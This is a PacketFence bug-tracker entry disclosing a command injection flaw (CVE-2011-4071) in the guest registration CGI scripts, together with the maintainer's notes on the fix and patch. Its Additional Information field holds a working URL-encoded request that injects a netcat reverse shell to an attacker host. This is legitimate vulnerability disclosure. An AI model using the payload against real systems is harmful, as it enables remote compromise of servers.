PacketFence - BTS - PacketFence
View Issue Details
IDProjectCategoryView StatusDate SubmittedLast Update
0001295PacketFencesecuritypublic2011-10-03 12:132011-10-24 20:17
Reportermattd 
Assigned Toobilodeau 
PrioritynormalSeveritymajorReproducibilityalways
StatusclosedResolutionfixed 
PlatformOSOS Version
Product Versiondevel 
Target Version3.0.2Fixed in Version3.0.2 
fixed in git revision
fixed in mtn revision92f9741dafd035ed1617b8ebb8d6a467cb0f1edb
Summary0001295: Command injection in guest management and captive portal web interfaces
DescriptionIn both the guest management (html/admin/guest-management.cgi) and captive portal (html/captive-portal/guest-selfregistration.cgi) web interfaces, shell command lines are constructed using several session parameters, which are then passed to the pf_run function for execution. However, these are not escaped, allowing an attacker to execute arbitrary commands on the system.

The existence of this vulnerability in the guest management interface would not normally be such an issue, however the authentication bypass described in bug 1294 allows the vulnerability to be exposed by an attacker for exploitation.
Steps To Reproduce
Additional InformationA sample request, triggering the injection and making the server create a reverse shell to the attacker listening on 192.168.1.1:1234 (assuming netcat is installed on the server):
guest-selfregistration.cgi?mode=guest-register&by_email=1&firstname=%22%27%3bnc%20-c%27sh%202%3E%261%27%20192.168.1.1%201234%20%23&lastname=x&email=x@example.com&phone=1&aup_signed=1
TagsNo tags attached.
Relationships
related to 0001308closed obilodeau guest access by sms doesn't record firstname, lastname 
Attached Filespatch security-fix-1295-command-injection.patch (9,249) 2011-10-13 13:44
https://www.packetfence.org/bugs/file_download.php?file_id=112&type=bug
Issue History
Date ModifiedUsernameFieldChange
2011-10-03 12:13mattdNew Issue
2011-10-06 11:47obilodeauStatusnew => assigned
2011-10-06 11:47obilodeauAssigned To => obilodeau
2011-10-13 13:44obilodeauFile Added: security-fix-1295-command-injection.patch
2011-10-13 13:56obilodeaumtn revision => 92f9741dafd035ed1617b8ebb8d6a467cb0f1edb
2011-10-13 13:56obilodeauNote Added: 0002342
2011-10-13 13:56obilodeauStatusassigned => resolved
2011-10-13 13:56obilodeauFixed in Version => +1
2011-10-13 13:56obilodeauResolutionopen => fixed
2011-10-13 13:57obilodeauRelationship addedrelated to 0001308
2011-10-17 10:40obilodeauNote Added: 0002366
2011-10-24 16:45obilodeauView Statusprivate => public
2011-10-24 20:15obilodeauTarget Version => 3.0.2
2011-10-24 20:15obilodeauNote Added: 0002383
2011-10-24 20:16obilodeauStatusresolved => closed
2011-10-24 20:17obilodeauFixed in Version+1 => 3.0.2

Notes
(0002342)
obilodeau   
2011-10-13 13:56   
Fixed command injection by doing parametrized SQL instead of calling pfcmd person command. While I was there, I fixed a problem with SMS activation where username and lastname were not properly kept (0001308).

Some potentially dangerous characters could still be injected in the SQL-based person creation mechanism so I made sure to sanitize the output in the Web Admin to prevent XSS there:
- Converting dangerous characters into HTML entities in the Web Admin's tableprint
- Converting dangerous characters into HTML entities in the Web Admin's person edit dialog

I haven't re-validated all of the admin because it's a lot of work and most of the other areas (except person) are not directly controlled by user input or are validated.

Fix will be released in 3.0.2 shortly.

Those you can't wait or who won't upgrade in a timely fashion should apply the attached patch. It should apply cleanly on 3.0+. Users of PacketFence before version 3.0.0 are *not* affected.
(0002366)
obilodeau   
2011-10-17 10:40   
This vulnerability has been assigned: CVE-2011-4071.
(0002383)
obilodeau   
2011-10-24 20:15   
fix released in 3.0.2